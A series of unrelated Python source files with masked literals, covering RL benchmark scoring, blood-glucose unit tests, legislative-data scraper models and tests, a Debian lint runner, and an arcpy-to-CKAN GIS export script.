timestamps [ - <NUM_LIT:1> ] - initial_reset_timestamp <EOL> if len ( episode_rewards ) >= trials : <EOL> means = running_mean ( episode_rewards , trials ) <EOL> if reward_threshold is not None : <EOL> ( indexes_above_threshold , ) = np . where ( means >= reward_threshold ) <EOL> if len ( indexes_above_threshold ) > <NUM_LIT:0> : <EOL> episode_t_value = indexes_above_threshold [ <NUM_LIT:0> ] <EOL> cumulative_timesteps = np . cumsum ( np . insert ( episode_lengths , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> timestep_t_value = cumulative_timesteps [ episode_t_value ] <EOL> seconds_to_solve = timestamps [ episode_t_value ] - initial_reset_timestamp <EOL> best_idx = np . argmax ( means ) <EOL> best_rewards = episode_rewards [ best_idx : best_idx + trials ] <EOL> mean = np . mean ( best_rewards ) <EOL> error = np . std ( best_rewards ) / ( np . 
sqrt ( trials ) - <NUM_LIT:1> ) <EOL> return { <EOL> '<STR_LIT>' : episode_t_value , <EOL> '<STR_LIT>' : timestep_t_value , <EOL> '<STR_LIT>' : mean , <EOL> '<STR_LIT:error>' : error , <EOL> '<STR_LIT>' : len ( episode_rewards ) , <EOL> '<STR_LIT>' : sum ( episode_lengths ) , <EOL> '<STR_LIT>' : seconds_to_solve , <EOL> '<STR_LIT>' : seconds_in_total , <EOL> } <EOL> def running_mean ( x , N ) : <EOL> x = np . array ( x , dtype = '<STR_LIT>' ) <EOL> cumsum = np . cumsum ( np . insert ( x , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> return ( cumsum [ N : ] - cumsum [ : - N ] ) / N <EOL> def compute_graph_stats ( episode_lengths , episode_rewards , timestamps , initial_reset_timestamp , buckets ) : <EOL> """<STR_LIT>""" <EOL> import scipy <EOL> num_episodes = len ( episode_lengths ) <EOL> episode_rewards = np . array ( episode_rewards ) <EOL> episode_lengths = np . array ( episode_lengths ) <EOL> x_timestep = np . cumsum ( np . insert ( episode_lengths , <NUM_LIT:0> , <NUM_LIT:0> ) ) [ : - <NUM_LIT:1> ] <EOL> assert len ( x_timestep ) == num_episodes <EOL> x_seconds = [ timestamp - initial_reset_timestamp for timestamp in timestamps ] <EOL> x_episode = range ( num_episodes ) <EOL> x_timestep_y_reward = scipy . stats . binned_statistic ( x_timestep , episode_rewards , '<STR_LIT>' , buckets ) <EOL> x_timestep_y_length = scipy . stats . binned_statistic ( x_timestep , episode_lengths , '<STR_LIT>' , buckets ) <EOL> x_episode_y_reward = scipy . stats . binned_statistic ( x_episode , episode_rewards , '<STR_LIT>' , buckets ) <EOL> x_episode_y_length = scipy . stats . binned_statistic ( x_episode , episode_lengths , '<STR_LIT>' , buckets ) <EOL> x_seconds_y_reward = scipy . stats . binned_statistic ( x_seconds , episode_rewards , '<STR_LIT>' , buckets ) <EOL> x_seconds_y_length = scipy . stats . 
binned_statistic ( x_seconds , episode_lengths , '<STR_LIT>' , buckets ) <EOL> return { <EOL> '<STR_LIT>' : initial_reset_timestamp , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_timestep_y_reward ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_timestep_y_length ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_episode_y_reward ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_episode_y_length ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_seconds_y_length ) , <EOL> '<STR_LIT>' : graphable_binned_statistic ( x_seconds_y_reward ) , <EOL> } <EOL> def graphable_binned_statistic ( binned ) : <EOL> x = running_mean ( binned . bin_edges , <NUM_LIT:2> ) <EOL> y = binned . statistic <EOL> assert len ( x ) == len ( y ) <EOL> valid = np . logical_not ( np . isnan ( x ) ) & np . logical_not ( np . isnan ( y ) ) <EOL> x = x [ valid ] <EOL> y = y [ valid ] <EOL> return { <EOL> '<STR_LIT:x>' : x , <EOL> '<STR_LIT:y>' : y , <EOL> } </s>
<s> class Display ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def display ( klass , unit , val ) : <EOL> assert unit in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if unit == '<STR_LIT>' : <EOL> return int ( round ( val ) ) <EOL> elif unit == '<STR_LIT>' : <EOL> return round ( val , <NUM_LIT:1> ) </s>
<s> from unittest import TestCase <EOL> from mock import Mock <EOL> from openaps . vendors . units import bg_targets <EOL> class BgTargetsTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def mg_dl_pump_response ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:100> } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> ] } . copy ( ) <EOL> def mmol_l_pump_response ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ { '<STR_LIT>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:5> } ] } . copy ( ) <EOL> class MockMethod ( ) : <EOL> pass <EOL> class MockParent ( ) : <EOL> device = '<STR_LIT>' <EOL> def test_read_bg_targets_from_mg_dl_pump ( self ) : <EOL> instance = bg_targets ( None , BgTargetsTestCase . MockParent ( ) ) <EOL> instance . units = '<STR_LIT>' <EOL> instance . to_unit = instance . CONVERTERS [ instance . units ] <EOL> response = instance . convert ( self . mg_dl_pump_response ( ) ) <EOL> expected_response = dict ( { <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:100> } , { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:200> } ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> self . assertEqual ( response , expected_response ) <EOL> def test_read_bg_targets_from_mmol_l_pump ( self ) : <EOL> instance = bg_targets ( None , BgTargetsTestCase . MockParent ( ) ) <EOL> instance . units = '<STR_LIT>' <EOL> instance . to_unit = instance . CONVERTERS [ instance . units ] <EOL> response = instance . convert ( self . mmol_l_pump_response ( ) ) <EOL> expected_response = { <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertEqual ( response , expected_response ) </s>
from .base import BaseModel, Scraper
from .schemas.jurisdiction import schema
from .popolo import Organization


class Jurisdiction(BaseModel):
    """<STR_LIT>"""
    # Type tag and validation schema used by the BaseModel machinery.
    _type = '<STR_LIT>'
    _schema = schema
    # Class-level defaults; concrete jurisdictions are expected to
    # override these rather than mutate the shared objects in place.
    classification = None
    name = None
    url = None
    legislative_sessions = []
    feature_flags = []
    extras = {}
    scrapers = {}
    default_scrapers = {}
    parties = []
    ignored_scraped_sessions = []
    check_sessions = False

    def __init__(self):
        # NOTE(review): super(BaseModel, self) deliberately skips
        # BaseModel.__init__ (it resolves to BaseModel's parent);
        # _related and extras are initialized by hand instead --
        # confirm this is intentional.
        super(BaseModel, self).__init__()
        self._related = []
        self.extras = {}

    @property
    def jurisdiction_id(self):
        # Identifier derived from the division id and classification.
        return '<STR_LIT>'.format(self.division_id.replace('<STR_LIT>', '<STR_LIT>'),
                                  self.classification)

    # BaseModel machinery uses _id; alias it to the derived property.
    _id = jurisdiction_id

    def as_dict(self):
        # Serialize the jurisdiction's public attributes.
        return {'<STR_LIT>': self.jurisdiction_id, '<STR_LIT:id>': self.jurisdiction_id,
                '<STR_LIT:name>': self.name, '<STR_LIT:url>': self.url, '<STR_LIT>': self.division_id,
                '<STR_LIT>': self.classification,
                '<STR_LIT>': self.legislative_sessions,
                '<STR_LIT>': self.feature_flags, '<STR_LIT>': self.extras, }

    def get_session_list(self):
        # Subclasses must return the list of available sessions.
        raise NotImplementedError('<STR_LIT>')

    def __str__(self):
        return self.name

    def get_organizations(self):
        # Subclasses must yield the jurisdiction's organizations.
        raise NotImplementedError('<STR_LIT>')


class JurisdictionScraper(Scraper):
    def scrape(self):
        # Yield the jurisdiction itself, then each of its organizations,
        # then one Organization per declared party.
        yield self.jurisdiction
        for org in self.jurisdiction.get_organizations():
            yield org
        for party in self.jurisdiction.parties:
            org = Organization(classification='<STR_LIT>', name=party['<STR_LIT:name>'])
            yield org
import pytest
from pupa.scrape import Person, Organization, Membership, Post
from pupa.utils import get_pseudo_id
from validictory import ValidationError
import datetime


def test_basic_post():
    # A well-formed Post validates and includes its label in str().
    post = Post(label='<STR_LIT:1>', role='<STR_LIT>', organization_id='<STR_LIT>')
    assert '<STR_LIT:1>' in str(post)
    post.validate()


def test_basic_invalid_post():
    # A non-string label must fail validation.
    post = Post(label=<NUM_LIT:1>, role='<STR_LIT>', organization_id='<STR_LIT>')
    with pytest.raises(ValueError):
        post.validate()


def test_basic_membership():
    # str() of a Membership mentions both endpoints.
    m = Membership(person_id='<STR_LIT>', organization_id='<STR_LIT>')
    assert '<STR_LIT>' in str(m) and '<STR_LIT>' in str(m)


def test_basic_invalid_membership():
    # A non-string person_id must fail validation.
    membership = Membership(person_id=<NUM_LIT>, organization_id="<STR_LIT>")
    with pytest.raises(ValueError):
        membership.validate()


def test_basic_invalid_person():
    # A sourced Person validates, then fails once the name is cleared.
    bob = Person("<STR_LIT>")
    bob.add_source(url='<STR_LIT:foo>')
    bob.validate()
    bob.name = None
    with pytest.raises(ValidationError):
        bob.validate()


def test_basic_person():
    p = Person('<STR_LIT>')
    p.add_source('<STR_LIT>')
    assert p.name in str(p)
    p.validate()


def test_person_add_membership_org():
    # add_membership with an Organization object links the two ids and
    # carries the start/end dates through to the Membership.
    p = Person('<STR_LIT>')
    p.add_source('<STR_LIT>')
    o = Organization('<STR_LIT>', classification='<STR_LIT>')
    p.add_membership(o, role='<STR_LIT>', start_date='<STR_LIT>',
                     end_date=datetime.date(<NUM_LIT>, <NUM_LIT:5>, <NUM_LIT:8>))
    assert len(p._related) == <NUM_LIT:1>
    p._related[<NUM_LIT:0>].validate()
    assert p._related[<NUM_LIT:0>].person_id == p._id
    assert p._related[<NUM_LIT:0>].organization_id == o._id
    assert p._related[<NUM_LIT:0>].start_date == '<STR_LIT>'
    assert p._related[<NUM_LIT:0>].end_date == datetime.date(<NUM_LIT>, <NUM_LIT:5>, <NUM_LIT:8>)


def test_basic_organization():
    org = Organization('<STR_LIT>', classification='<STR_LIT>')
    org.add_source('<STR_LIT>')
    assert org.name in str(org)
    org.validate()


def test_no_source_on_party_org():
    # Party organizations validate even without a source.
    org = Organization('<STR_LIT>', classification='<STR_LIT>')
    org.validate()


def test_basic_invalid_organization():
    # Without a source, this organization fails validation.
    orga = Organization("<STR_LIT:name>")
    with pytest.raises(ValidationError):
        orga.validate()


def test_org_add_post():
    """<STR_LIT>"""
    orga = Organization("<STR_LIT:name>", classification="<STR_LIT>")
    orga.add_source(url='<STR_LIT:foo>')
    orga.validate()
    orga.add_post("<STR_LIT>", "<STR_LIT>")
    assert orga._related[<NUM_LIT:0>].role == "<STR_LIT>"
    assert orga._related[<NUM_LIT:0>].label == "<STR_LIT>"


def test_legislator_related_district():
    # pre_save creates one pseudo-id membership tying the person to the
    # district post.
    l = Person('<STR_LIT>', district='<STR_LIT:1>', primary_org='<STR_LIT>')
    l.pre_save('<STR_LIT>')
    assert len(l._related) == <NUM_LIT:1>
    assert l._related[<NUM_LIT:0>].person_id == l._id
    assert get_pseudo_id(l._related[<NUM_LIT:0>].organization_id) == {'<STR_LIT>': '<STR_LIT>'}
    assert get_pseudo_id(l._related[<NUM_LIT:0>].post_id) == {"<STR_LIT>": "<STR_LIT>",
                                                             "<STR_LIT:label>": "<STR_LIT:1>", "<STR_LIT>": "<STR_LIT>"}
    assert l._related[<NUM_LIT:0>].role == '<STR_LIT>'


def test_legislator_related_chamber_district():
    # Same as above but with a chamber-specific primary_org.
    l = Person('<STR_LIT>', district='<STR_LIT:1>', primary_org='<STR_LIT>')
    l.pre_save('<STR_LIT>')
    assert len(l._related) == <NUM_LIT:1>
    assert l._related[<NUM_LIT:0>].person_id == l._id
    assert get_pseudo_id(l._related[<NUM_LIT:0>].organization_id) == {'<STR_LIT>': '<STR_LIT>'}
    assert get_pseudo_id(l._related[<NUM_LIT:0>].post_id) == {"<STR_LIT>": "<STR_LIT>",
                                                             "<STR_LIT:label>": "<STR_LIT:1>", "<STR_LIT>": "<STR_LIT>"}
    assert l._related[<NUM_LIT:0>].role == '<STR_LIT>'


def test_legislator_related_party():
    # A party kwarg produces a pseudo-id membership in the party org.
    l = Person('<STR_LIT>', party='<STR_LIT>')
    l.pre_save('<STR_LIT>')
    assert len(l._related) == <NUM_LIT:1>
    assert l._related[<NUM_LIT:0>].person_id == l._id
    assert get_pseudo_id(l._related[<NUM_LIT:0>].organization_id) == {'<STR_LIT>': '<STR_LIT>',
                                                                     '<STR_LIT:name>': '<STR_LIT>'}
    assert l._related[<NUM_LIT:0>].role == '<STR_LIT>'


def test_committee_add_member_person():
    # add_member with a Person object links the concrete ids.
    c = Organization('<STR_LIT>', classification='<STR_LIT>')
    p = Person('<STR_LIT>')
    c.add_member(p, role='<STR_LIT>')
    assert c._related[<NUM_LIT:0>].person_id == p._id
    assert c._related[<NUM_LIT:0>].organization_id == c._id
    assert c._related[<NUM_LIT:0>].role == '<STR_LIT>'


def test_committee_add_member_name():
    # add_member with a bare name produces a pseudo-id person reference.
    c = Organization('<STR_LIT>', classification='<STR_LIT>')
    c.add_member('<STR_LIT>')
    assert get_pseudo_id(c._related[<NUM_LIT:0>].person_id) == {'<STR_LIT:name>': '<STR_LIT>'}
    assert c._related[<NUM_LIT:0>].organization_id == c._id
    assert c._related[<NUM_LIT:0>].role == '<STR_LIT>'


def test_person_add_membership_name():
    # add_membership with a bare org name produces a pseudo-id org ref.
    p = Person('<STR_LIT>')
    p.add_membership('<STR_LIT>', role='<STR_LIT>', start_date='<STR_LIT>')
    p._related[<NUM_LIT:0>].validate()
    assert get_pseudo_id(p._related[<NUM_LIT:0>].organization_id) == {'<STR_LIT:name>': '<STR_LIT>'}
    assert p._related[<NUM_LIT:0>].person_id == p._id
    assert p._related[<NUM_LIT:0>].role == '<STR_LIT>'
    assert p._related[<NUM_LIT:0>].start_date == '<STR_LIT>'
from debile.slave.runners.jshint import jshint, version


def run(dsc, package, job, firehose):
    """Delegate to the jshint runner; package and job are accepted for
    interface compatibility but unused here."""
    result = jshint(dsc, firehose)
    return result


def get_version():
    """Report the version of the underlying jshint runner."""
    return version()
class DebileException(Exception):
    """Root of the Debile exception hierarchy; catch this to handle any
    Debile-specific failure."""


class WrongUserException(DebileException):
    """Debile error subtype signalling a wrong-user condition
    (name-derived; see call sites for exact semantics)."""


class GpgImportException(DebileException):
    """Debile error subtype signalling a GPG import failure
    (name-derived; see call sites for exact semantics)."""
import argparse
import csv
import datetime
import glob
import logging
import logging.config
import os
import re
import shutil
import sys
import zipfile
import xml.etree.ElementTree as et

import arcpy
import ckanclient

# Module-level state shared by the export/publish pipeline; populated in main().
args = None
logger = None
output_folder = None
source_feature_class = None
staging_feature_class = None
ckan_client = None
temp_workspace = None

# Export formats this tool knows how to produce (masked literals preserved).
available_formats = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']

# Output spatial reference and datum transformation applied to all exports.
outCoordSystem = "<STR_LIT>"
geographicTransformation = '<STR_LIT>'


def _build_arg_parser():
    """Build the command-line parser for the publishing pipeline.

    Kept separate from main() so the argument wiring can be read (and
    reused) independently of the pipeline logic.
    """
    parser = argparse.ArgumentParser(fromfile_prefix_chars='<STR_LIT:@>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        required=True,
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        required=True,
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        choices=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:none>'],
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        choices=['<STR_LIT:description>', '<STR_LIT>', '<STR_LIT:all>'],
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        choices=['<STR_LIT>', '<STR_LIT>', '<STR_LIT:all>'],
                        default='<STR_LIT:all>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        choices=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'],
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        choices=['<STR_LIT>', '<STR_LIT>'],
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        action='<STR_LIT:store>',
                        dest='<STR_LIT>',
                        choices=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'],
                        default='<STR_LIT>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>',
                        action='<STR_LIT:store>',
                        help='<STR_LIT>')
    parser.add_argument('<STR_LIT>',
                        action='<STR_LIT:store>',
                        help='<STR_LIT>' '<STR_LIT>')
    parser.add_argument('<STR_LIT>',
                        action='<STR_LIT:store>',
                        help='<STR_LIT>' '<STR_LIT>')
    return parser


def main():
    """Export a feature class to the requested formats and publish to CKAN.

    Parses arguments, stages the data into a scratch file geodatabase,
    exports each requested format independently (a failure in one format
    is logged and does not abort the others), then updates the CKAN
    dataset entry. Exits with status 1 on any unrecoverable error.
    """
    global args, output_folder, source_feature_class, staging_feature_class, temp_workspace, logger

    args = _build_arg_parser().parse_args()

    if args.output_folder is not None:
        output_folder = args.output_folder.strip()
    if args.temp_workspace is not None:
        temp_workspace = args.temp_workspace.strip()

    # Fully qualify the source feature class when a workspace is supplied.
    if args.source_workspace is None:
        source_feature_class = args.feature_class
    else:
        source_feature_class = os.path.join(args.source_workspace, args.feature_class)

    # Default to every supported format, otherwise validate the requested list.
    if args.formats is None:
        args.formats = available_formats
    else:
        args.formats = args.formats.split('<STR_LIT:U+002C>')
    for arg in args.formats:
        if arg not in available_formats:
            raise Exception(str.format("<STR_LIT>", arg))

    init_logger()

    try:
        logger.info('<STR_LIT>')
        logger.info('<STR_LIT>')
        logger.info('<STR_LIT>'.format(os.getcwd()))
        logger.info('<STR_LIT>'.format(source_feature_class))
        logger.info('<STR_LIT>'.format(args.dataset_name))
        logger.info('<STR_LIT>'.format(output_folder))
        logger.info('<STR_LIT>'.format(args.exe_result))
        logger.info('<STR_LIT>'.format(str(args.formats)))

        # Start from a clean scratch area for this dataset.
        delete_dataset_temp_folder()
        output_folder = create_dataset_folder()
        temp_workspace = create_dataset_temp_folder()

        if args.exe_result != '<STR_LIT>':
            # Project all exports into the configured coordinate system.
            arcpy.env.outputCoordinateSystem = outCoordSystem
            arcpy.env.geographicTransformations = geographicTransformation

        if len(args.formats) > 0:
            logger.info('<STR_LIT>')
            # Stage a scratch copy so the source feature class is never mutated.
            staging_feature_class = export_file_geodatabase()
            drop_exclude_fields()
            export_metadata()

        # Each format exports independently; log and continue on failure.
        if '<STR_LIT>' in args.formats:
            try:
                logger.info('<STR_LIT>')
                export_shapefile()
            except Exception:
                if logger:
                    logger.exception('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0]))
        if '<STR_LIT>' in args.formats:
            try:
                logger.info('<STR_LIT>')
                publish_metadata()
            except Exception:
                if logger:
                    logger.exception('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0]))
        if '<STR_LIT>' in args.formats:
            try:
                logger.info('<STR_LIT>')
                publish_file_geodatabase()
            except Exception:
                if logger:
                    logger.exception('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0]))
        if '<STR_LIT>' in args.formats:
            try:
                logger.info('<STR_LIT>')
                export_cad()
            except Exception:
                if logger:
                    logger.exception('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0]))
        if '<STR_LIT>' in args.formats:
            try:
                logger.info('<STR_LIT>')
                export_kml()
            except Exception:
                if logger:
                    logger.exception('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0]))
        if '<STR_LIT>' in args.formats:
            try:
                logger.info('<STR_LIT>')
                export_csv()
            except Exception:
                if logger:
                    logger.exception('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0]))

        if args.exe_result != '<STR_LIT>':
            # Drop formats whose export produced no output before publishing.
            remove_missing_formats_from_publication(output_folder)
            if len(args.formats) > 0:
                publish_to_ckan()

        logger.info('<STR_LIT>' + args.dataset_name)
        logger.info('<STR_LIT>')
    except Exception:
        if logger:
            logger.exception('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0]))
        sys.exit(1)


def publish_to_ckan():
    """Create or update the CKAN dataset entry for the exported data."""
    global ckan_client
    ckan_client = ckanclient.CkanClient(base_location=args.ckan_api, api_key=args.ckan_api_key)
    dataset_id = args.ckan_dataset_name_prefix + args.dataset_name
    dataset_entity = get_remote_dataset(dataset_id)
    if dataset_entity is None:
        create_dataset(dataset_id)
    else:
        update_dataset(dataset_entity)
    if args.increment != '<STR_LIT:none>':
        update_dataset_version()


def remove_missing_formats_from_publication(directory):
    """Filter args.formats down to those whose export folder actually exists."""
    formats = []
    for exp_format in args.formats:
        logger.debug('<STR_LIT>'.format(exp_format))
        # Some formats publish into a folder whose name differs from the
        # format key itself (masked literals preserved from the original).
        if exp_format == '<STR_LIT>':
            exp_dir = '<STR_LIT>'
        elif exp_format == '<STR_LIT>':
            exp_dir = '<STR_LIT>'
        else:
            exp_dir = exp_format
        exp_dir = os.path.join(directory, exp_dir)
        if os.path.exists(exp_dir):
            formats.append(exp_format)
    args.formats = formats


def create_folder(directory, delete=False):
    """Ensure *directory* exists; optionally recreate it from scratch.

    Returns the directory path for chaining.
    """
    if os.path.exists(directory) and delete:
        logger.debug('<STR_LIT>' + directory)
        shutil.rmtree(directory)
    if not os.path.exists(directory):
        logger.debug('<STR_LIT>' + directory + '<STR_LIT>')
        os.makedirs(directory)
    return directory


def create_dataset_folder():
    """Create (if needed) and return the dataset's output folder."""
    directory = os.path.join(output_folder, get_dataset_filename())
    create_folder(directory)
    return directory


def create_dataset_temp_folder():
    """Create (if needed) and return the dataset's scratch folder."""
    global temp_workspace
    directory = os.path.join(temp_workspace, get_dataset_filename())
    create_folder(directory)
    return directory


def delete_dataset_temp_folder():
    """Remove the scratch geodatabase and scratch folder from a prior run."""
    global temp_workspace
    name = get_dataset_filename()
    gdb_folder = os.path.join(temp_workspace, '<STR_LIT>')
    gdb_file = os.path.join(gdb_folder, name + '<STR_LIT>')
    logger.debug('<STR_LIT>' + gdb_file)
    if os.path.exists(gdb_file):
        # Let arcpy remove the geodatabase so its locks are handled properly.
        arcpy.Delete_management(gdb_file)
    dataset_directory = os.path.join(temp_workspace, name)
    if os.path.exists(dataset_directory):
        logger.debug('<STR_LIT>' + dataset_directory)
        shutil.rmtree(dataset_directory)


def publish_file(directory, file_name, file_type):
    """Copy *file_name* from *directory* into the per-format output folder."""
    folder = create_folder(os.path.join(output_folder, file_type))
    logger.info('<STR_LIT>' + file_name + '<STR_LIT>' + folder)
    shutil.copyfile(os.path.join(directory, file_name), os.path.join(folder, file_name))


def get_dataset_filename():
    """Return the dataset name converted to a filesystem-safe identifier."""
    global args
    return args.dataset_name.replace('<STR_LIT:->', '<STR_LIT:_>')


def get_dataset_title():
    """Return the CKAN display title (configured prefix + dataset title)."""
    global args
    return args.ckan_dataset_title_prefix + '<STR_LIT>' + args.dataset_title


def export_file_geodatabase():
    """Copy the source feature class into a scratch file geodatabase.

    Returns the staged feature class path used by all later exports.
    """
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    create_folder(temp_working_folder, True)
    gdb_temp = os.path.join(temp_working_folder, name + '<STR_LIT>')
    gdb_feature_class = os.path.join(gdb_temp, name)
    if not arcpy.Exists(gdb_temp):
        logger.debug('<STR_LIT>' + args.gdb_version + '<STR_LIT>' + gdb_temp)
        arcpy.CreateFileGDB_management(os.path.dirname(gdb_temp), os.path.basename(gdb_temp), args.gdb_version)
    logger.debug('<STR_LIT>' + source_feature_class)
    logger.debug('<STR_LIT>' + gdb_feature_class)
    arcpy.CopyFeatures_management(source_feature_class, gdb_feature_class)
    return gdb_feature_class


def publish_file_geodatabase():
    """Zip the staged file geodatabase and publish the archive."""
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    logger.debug('<STR_LIT>')
    zip_file_name = os.path.join(temp_working_folder, name + '<STR_LIT>')
    gdb_file_name = os.path.join(temp_working_folder, name + '<STR_LIT>')
    # 'with' guarantees the archive is closed even if a write fails.
    with zipfile.ZipFile(zip_file_name, '<STR_LIT:w>') as zip_file:
        for filename in glob.glob(gdb_file_name + '<STR_LIT>'):
            # Skip lock files left behind by ArcGIS sessions.
            if not filename.endswith('<STR_LIT>'):
                zip_file.write(filename, name + '<STR_LIT>' + os.path.basename(filename), zipfile.ZIP_DEFLATED)
    publish_file(temp_working_folder, name + '<STR_LIT>', '<STR_LIT>')


def export_shapefile():
    """Export the staged feature class to a zipped shapefile and publish it."""
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    create_folder(temp_working_folder, True)
    zip_folder = os.path.join(temp_working_folder, name)
    create_folder(zip_folder)
    source = staging_feature_class
    destination = os.path.join(zip_folder, name + '<STR_LIT>')
    logger.debug('<STR_LIT>' + source + '<STR_LIT>' + destination + '<STR_LIT:">')
    arcpy.CopyFeatures_management(source, destination, '<STR_LIT>', '<STR_LIT:0>', '<STR_LIT:0>', '<STR_LIT:0>')
    logger.debug('<STR_LIT>')
    with zipfile.ZipFile(os.path.join(temp_working_folder, name + '<STR_LIT>'), '<STR_LIT:w>') as zip_file:
        for filename in glob.glob(zip_folder + '<STR_LIT>'):
            zip_file.write(filename, os.path.basename(filename), zipfile.ZIP_DEFLATED)
    publish_file(temp_working_folder, name + '<STR_LIT>', '<STR_LIT>')


def export_cad():
    """Export the staged feature class to CAD and publish the drawing."""
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    create_folder(temp_working_folder, True)
    source = staging_feature_class
    destination = os.path.join(temp_working_folder, name + '<STR_LIT>')
    logger.debug('<STR_LIT>' + source + '<STR_LIT>' + destination + '<STR_LIT:">')
    arcpy.ExportCAD_conversion(source, '<STR_LIT>', destination, '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
    publish_file(temp_working_folder, name + '<STR_LIT>', '<STR_LIT>')


def export_kml():
    """Export the staged feature class to KML/KMZ and publish it.

    Requires the 3D Analyst-style extension checked out via arcpy.
    """
    arcpy.CheckOutExtension('<STR_LIT>')
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    create_folder(temp_working_folder, True)
    destination = os.path.join(temp_working_folder, name + '<STR_LIT>')
